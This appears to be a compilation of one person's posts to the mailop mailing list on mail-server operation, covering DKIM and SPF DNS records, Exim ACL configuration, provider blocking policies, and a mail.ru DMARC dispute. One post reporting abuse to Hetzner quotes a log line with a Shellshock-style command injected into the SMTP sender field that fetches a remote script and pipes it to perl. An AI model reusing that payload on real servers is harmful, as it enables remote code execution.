Re: [mailop] onmicrosoft.com customers forging @microsoft.com addresses for phishing
> From: "L. Mark Stone" > FWIW, for a while now we have been outright blocking all email from any > subdomain of onmicrosoft.com > If anyone has an example of how what we are doing would lead to a false > positive, I would be grateful to know please. One of my 3500 customers uses email address @Xzone.onmicrosoft.com where X is her surname. SPF include:spf.protection.outlook.com Received: from mail-cwxgbr01on2110.outbound.protection.outlook.com DKIM-Signature: ...d=Xzone.onmicrosoft.com x-forefront-antispam-report: ...;SFV:NSPM;... ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] Plain connections on SubmissionS port
> From: Slavko I'm curious: do you get many legitimate connections to tls_on_connect port 465 (instead of STARTTLS 587)? Do you tell your users how to use 587, 465 or both? ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] % in SRS ?
> You will still run into a fair number of systems that still see % as > an attempt to do source routing and reject the message. Including default Exim config: https://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_default_configuration_file.html denydomains = !+local_domains local_parts = ^[./|] : ^.*[@%!] : ^.*/\\.\\./ message = Restricted characters in address ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] Dot as the first character of a line ? (RFC 5321, Section 4.5.2)
> From: Cyril - ImprovMX > It turns out that one of their link in the email is broken into multiple > line (following the RFC on that) Solution: don't follow the RFC on that, don't break into multiple lines. If you use Exim then in transports driver = smtp .ifdef _OPT_TRANSPORT_SMTP_MESSAGE_LINELENGTH_LIMIT message_linelength_limit = 15000 .endif All was fine until Exim developers decided to follow RFC on that. > and surprisingly, the dot from > "www.domain" was starting as the new line, which gives: So it turned out that breaking into multiple lines is not as simple when the break point happens near a dot. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] Any old-school sendmail types here good with the m4?
> I don't know where > to buy the brand of LSD that they did at UC Berkeley when they wrote this, > in order to make m4 make sense. They chose incomprehensible m4 in order to coerce you to buy support from them. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] NS DKIM
> That (sub)domain is not DNSSEC signed, thus it will work with > (many) recursive resolvers for some time. DNSSEC mandates > NoDATA for empty non terminals, thus there can be problem > once it become signed (and SW and/or admin will not be > upgraded). Okay, I created a TXT record for the parent _domainkey . Though I'm sure that most other users of such registrar's web-interfaces wouldn't do that. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
[mailop] NS DKIM
> If the DNS name xxx._domainkey.example.com exists, then > _domainkey.example.com exists too. dig 3._domainkey.lena.kiev.ua txt 3._domainkey.lena.kiev.ua. 66633 IN TXT "v=DKIM1; p=MIGfMA0GCSqGSIb... dig _domainkey.lena.kiev.ua txt ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 57410 `dig @8.8.8.8` tells the same. `dig +trace 3._dom...` works. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] mailgun anybody? (variable sender address) time
> > > They have SPF, but no DKIM (NXDOMAIN for the _domainkey.bsi.de) > > > Or did I miss something? > > > > The DKIM keys would be at ._domainkey.bsi.de > > Yes, but as long as the parent of *any* selector does not exist, there > is a very good chance, that not any selector exists. > > If the query for _domainkey.bsi.de would return a no-data answer, than > I can assume that they have someing below that name (most probably > selectors I do not know until I get a mail from them.) For NS I currently use the registrar. Its web-interface allowed me to create the TXT record for a selector. The parent _domainkey - NXDOMAIN. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
[mailop] Hetzner
I emailed abuse()hetzner.com:
=
Your user at 136.243.150.82 hosts malware to exploit vulnerability in
mail (SMTP) servers. In the log of my Exim:
2023-01-17 00:33:40 +0200 SMTP call from newcloud.thevinylspectrum.com (x)
[104.200.146.132] dropped: too many syntax or protocol errors (last command was
"MAIL FROM:<() { :; }; wget -qO - 136.243.150.82/qmx|perl;curl -sS
136.243.150.82/qmx|perl>", C=HELO,MAIL)
=
20 days (!) later I received a reply [AbuseID:BEA948:23]:
=
We have received your information regarding spam and/or abuse and we shall
follow up on this matter.
The person responsible has been sent the following instructions:
- Solve the issue
- Send us a response
=
My conclusion is that Hetzner is a heaven for spammers.
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
Re: [mailop] Opinions.. Layer Host aka Global Frag, Higher level approaches
> Just ban *.top, *.xyz, *.club, *.shop, *.buzz, *.work > > Ban it in both rDNS, MFROM and Mime From. I communicated with 6 honest people with email addresses *.xyz ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders
> From: Kai 'wusel' Siering
> > Then a different check:
>
> I don't speak smail3^Hexim anymore, but I assume it's somewhat similar to
>
> telnet $mx 25
> if 2xx send quit
> if 5xx set fuckem=1 && send quit || ignore errors
> if $fuckem<1 die in_peace else wreck havoc
>
> ?
I don't know why, but Exim's ${readsocket works without the "quit":
[root@lena ~]# time exim -be '${readsocket{inet:mx00.t-online.de:25}{}{2s}}!'
220-mailin78.mgt.mul.t-online.de T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.
!
real0m0.052s
user0m0.024s
sys 0m0.001s
[root@lena ~]# telnet mx00.t-online.de 25
Trying 194.25.134.8...
Connected to mx00.t-online.de.
Escape character is '^]'.
220-mailin82.mgt.mul.t-online.de T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.
quit
221-2.0.0 mailin82.mgt.mul.t-online.de closing.
221 2.0.0 Closing.
Connection closed by foreign host.
[root@lena ~]#
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders
> T-Online clearly states in their terms and conditions that they will
> block servers who perform sender verfication towards them.
Then a different check:
deny condition = ${if or{\
{eqi{$sender_address_domain}{t-online.de}}\
.ifdef _HAVE_LOOKUP_DNSDB
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
{match{$item}{\N^mx\d+\.t-online\.de$\N}}}\
.endif
}}
condition = ${if match{${readsocket{inet:\
.ifdef _HAVE_LOOKUP_DNSDB
${reduce{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
{}{$item}}\
.else
mx00.t-online.de\
.endif
:25}{}{2s}}}{^554 IP=}}
message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
Re: [mailop] T-Online is now really blocking messages from non-commercial and simliar senders
Kai Siering wrote on [mailop]:
> how about starting internal discussions within that community
> to include a default rejection of any mail from @t-online.de
> in Exim's default configuration?
> As nearly no-one who is deploying Exim
> (or Postfix, Sendmail for that matter)
> will be able to *send* to @t-online.de due to their policy,
> it is only logical to not *accept* any mail from them, too.
I propose to include in default Exim config (in rcpt ACL)
a code which checks whether the server is blocked by t-online.de:
warn set acl_m_ton = notton
condition = ${if or{\
{eqi{$sender_address_domain}{t-online.de}}\
.ifdef _HAVE_LOOKUP_DNSDB
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
{match{$item}{\N^mx\d+\.t-online\.de$\N}}}\
.endif
}}
set acl_m_ton = checkdefer
!verify = sender/callout=10s
set acl_m_ton = $acl_verify_message
deny condition = ${if !eq{$acl_m_ton}{notton}}
condition = ${if !eq{$acl_m_ton}{checkdefer}}
message = sender verify failed: $acl_m_ton
deny condition = ${if eq{$acl_m_ton}{checkdefer}}
message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).
___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
Re: [mailop] Looking for contact at iphmx.com
> The good folks at SecurityTrails figured out a few months ago that the > presence of the RoundCube webmail product counts as "phishing against > the generic brand of email" (I shit you not) By default RoundCube doesn't include originating-IP into headers of outgoing emails. Default means vast majority of installations. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] spam filters
> From: "Sebastian Nielsen" > for example *.xyz is a big spam hole... Don't know why spammers love > that TLD, but 99.99 % from that TLD is spam. Would want to see *.xyz > eradicated from the whole internet... I communicated with 6 honest people with email addresses *.xyz ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] [E] Re: What am I supposed to do with abuse complaints on legit mail?
> From: Marcel Becker > We only send FBL/CFL reports if the user actually hits the "Report as Spam" > button in our apps. In the past yahoo sent FBL when the user deletes a message from Spam folder, including "delete everything". May be even when messages expire. I'd not be surprised if this behavior continues. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] Google Postmaster Tools - No data since October 4th
> From: Jaroslaw Rafa > "low reputation of the sending domain" I'm afraid that it'll be the same for any free domain name (because of abuse by spammers). Unfair, yes. But possibly content of your emails causes Gmail users to click "Spam" more often than caused by average user stupidity. Or you pissed off one Gmail user, and now he clicks "Spam" on every your email. Or he always deletes everybody's emails with the Spam button. Influence of IP block or AS reputation also is possibile, despite the text of the error message. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] How to detect fraud login in POP IMAP or SMTP?
> From: Alessio Cecchi > we are an email hosting provider, and as you know many users use weak > passwords, or have trojan on their PC that stolen their password that > are used to sent spam or doing some kinds of fraud. > > We already have a "script" that checks, from log files, the country of > the IP address and "do something" to detect if is an unusual login. But > is not really sufficient. I suspect that stealing passwords with trojans is more successful than brute-forcing passwords via POP, IMAP or SMTP. Therefore, detecting logins for brute-forcing is not enough. You need to detect when stolen passwords are used to send spam via your server. One approach is to check rate of attempts to send to non-existent recipient email addresses, because spammers usually send to dirty lists of email addresses full of message-ids, truncated email addreses or prepended with garbage. I wrote an implementation for Exim: https://github.com/Exim/exim/wiki/BlockCracking It also detects some brute-forcing, but the main is automatic blocking of accounts used for spamming with trojan-stolen passwords. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] mail.ru broke mailing lists
> My guess is that the solution is to have your mailing list software > (groups.io) use the mailing list address in the 5322.From > (like how this list works) No, I'll tell list members to ditch mail.ru and use Gmail or @yandex.ru instead (with more reasonable policies). Unless the mail.ru admin on this list understands the problem and doesn't try to tell every mailing list admin in the world to conform to his whims. The groups.io admin already rewrites "From:" for domains with DMARC p=reject. I don't want him to mangle every "From:". ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
[mailop] mail.ru broke mailing lists
According to Юлия П. in Abuse Team Mail.ru, they'll not change their new unannounced policy: messages from mailing lists (at groups.io) from authors @yandex.ru are rejected by mail.ru though DMARC for yandex.ru is p=none. Thus, mail.ru became unusable for all people who participate in discussion mailing lists. Below my futile attempts to explain (bottom-quoting required by them). = Subject: Re: [Ticket#2021071021014077] Мои письма воспринимаются как спам Date: Mon, 12 Jul 2021 11:54:08 +0300 To: l...@lena.kiev.ua From: "ab...@corp.mail.ru" Здравствуйте. Ответ о причине блокировке был дан ранее, каждый почтовый провайдер в праве использовать собственные метрики для своей антиспам-системы. Блокировка писем, которые поступают без авторизации на соответствующих серверах, не будет снята, эта логика не может быть изменена. -- С уважением, Юлия П. Abuse Team Mail.ru > У домена yandex.ru политика DMARC "p=none", именно чтобы не ломать > mailing lists. Поэтому в данном случае mail.ru не имеет права > отвергать письма по поводу DMARC. > > mail.ru имел бы право отвергать письма, если бы yandex.ru написал > "p=reject". > Но yandex этого не сделал. Преднамеренно, чтобы discussion mailing lists > могли продолжать работать. > > Я надеюсь, что сегодня на смене поддержки mail.ru более компетентный > работник. > > ~ $ dig +short _dmarc.yandex.ru txt > "v=DMARC1; p=none; fo=1; > rua=mailto:dmarc_...@auth.returnpath.net,mailto:dmarc-...@yandex.ru; > ruf=mailto:dmarc_a...@auth.returnpath.net"; > ~ $ > > > Повторимся, SPF в ваших письмах действительно проходят проверку, но из-за > > того, что From и envelope-from не совпадают, такие письма технически > > считаются подставными по отношению к домену, указанному во From - адресу > > видимому получателю, по аналогии с действием политики DMARC: > > https://tools.ietf.org/html/rfc7489 > > > > Для решения вопроса вы можете использовать иную систему, используя адрес в > > собственном домене в качестве отправителя, а не сохраняя/подставляя адрес > > клиента. В таком случае письма успешно пройдут спам-фильтры. > > > > -- > > С уважением, > > Юлия П. > > Abuse Team Mail.ru > > > > > > > Вы не понимаете, как работают SPF и discussion mailing list. > > > Вы наверно даже никогда не пользовались ими. > > > Участники конференции отправляют письма на адрес конференции > > > (в данном случае tg...@groups.io), сервер конференций > > > рассылает копии всем участникам конференции. В строке заголовка "From:" > > > сохраняется (не подставляется, а сохраняется!) адрес автора письма > > > (в данном случае @yandex.ru), > > > а в envelope-from (Return-Path) сервер конференций указывает адрес > > > @groups.io . > > > Это не я придумала, listserver-ы используются с 1984 года. > > > Проверка SPF должна быть по envelope-from, а не "From:". > > > Вы не понимаете, что такое envelope-from. > > > Вы жмете на первую попавшуюся кнопку, не понимая сути проблемы. > > > Пожалуйста, передайте эту переписку специалистам. > > > > > > > Мы понимаем, как работает SPF и для какого домена она проверяется. Суть > > > > не > > > > в невалидности SPF самой по себе, а в том, что фактически письма > > > > отправляются с одних серверов, а в качестве отправителя подставляется > > > > совершенно иной домен mailbox-провайдера. Если вы не можете обеспечить > > > > авторизацию непосредственно для yandex.ru, отправляя письма якобы с > > > > него, > > > > рекомендуем использовать соответствующий вашему собственному домену > > > > From. > > > > > > > > -- > > > > С уважением, > > > > Юлия П. > > > > Abuse Team Mail.ru > > > > > > > > > > > > > Работник support-а Юлия П. не читает, тыкает на кнопки куда попадя. > > > > > > > > > > > Письмо, по вопросу блокировки которого вы обратились, было > > > > > > отправлено с > > > > > > yandex.ru без авторизации на их серверах (не прошло проверку > > > > > > SPF/DKIM). > > > > > > Подробнее об этих настройках можно узнать здесь: > > > > > > https://help.mail.ru/postmaster/technical-settings/notes > > > > > > > > > > > > Если вы хотите отправлять письма с ящика yandex.ru, то они должны > > > > > > поступать > > > > > > с авторизацией на серверах Яндекса соответственно. Если же > > > > > > валидность > > > > > > SPF/DKIM для yandex.ru не может быть обеспечена, используйте адрес в > > > > > > собственном домене в качестве отправителя. Напомним о необходимости > > > > > > реализации SPF, DKIM и DMARC для него перед отправкой писем. > > > > > > > > > > > > -- > > > > > > С уважением, > > > > > > Юлия П. > > > > > > Abuse Team Mail.ru > > > > > > > > > > > > Помог ли вам данный ответ? > > > > > > > Все темы, Мои письма воспринимаются как спам > > > > > > > > > > > > > > > > > > > > > Я модератор email-конференции (discussion mailing list) на сервере > > > > > > > groups.io. Этот сервер использует всего два IP-адреса > > > > > > > 66.175.222.12 и > > > > > > > 66.175.222.108 для отправки почты из многих тысяч ко
Re: [mailop] Mailman confirmation email denial of service
> I have searched a few emails, but fail to see why they would be a > target. Maybe only a few of them are the real targets, with other > addresses being added in order to conceal those? I suspect that the bot is spamming random web-forms like various bots try to spam my guestbook with ads with links. If a bot sees an "email" field then it fills it with a random email address. ___ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
Re: [mailop] Ideas for possible content for FAQ: "Best Practices for running a mail server"
> Either links to existing material or specific stuff written for pages > on would be welcome. Blocking of compromised mail accounts (for Exim): https://github.com/Exim/exim/wiki/BlockCracking ___ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
[mailop] Russian government blocks mail
Russian government blocked ProtonMail and SmartMail - not only web-interfaces, but port 25 too. [root@lena ~]# telnet mail.protonmail.ch 25 Trying 185.70.40.103... telnet: connect to address 185.70.40.103: Connection refused I'm moving my VPS outside Russia. Talks about fake bomb threats are a lie, KGB (FSB) wants personal data. ___ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
Re: [mailop] Gmail marking email from me as spam
Two examples: co.uk bk.ru Looks similar, right? But there are multiple domains under .co.uk belonging to multiple different corporaions, like under .com bk.ru belongs to single corporation (it owns also mail.ru). If a mailbox provider wants to spam-filter by domain, they have to use a list of such multiple-corporation domains (what is the proper term?). How a mailbox provider might know to include eu.org into that list? Whois for eu.org doesn't offer a clue. ___ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
Re: [mailop] Admin: Gmail users of mailop suspended due to bounces.
> Another issue in that is the choice to send mail over IPv6. This has > well-known risks of running into more draconian filtering than sticking > with IPv4, and the operators of the mailing lists system have clearly > NOT considered those risks or their mitigation. > Mailing list managers should not assume anything about the > state of messages that come in. Especially if there is a trivial action > that they can take to make sure that the message they send out does not > break something. I receive digests from [mailop]. Header of last digest hasn't DKIM. The envelope-from is , the mailop.org domain currently hasn't SPF. With sending mail via IPv6, it's a recipe for disaster. ~ $ dig +short mailop.org txt ~ $ > In this case, said trivial action is removing / renaming the incoming > DKIM-Signature header. And adding one for the mailop.org domain. ___ mailop mailing list mailop@mailop.org https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop
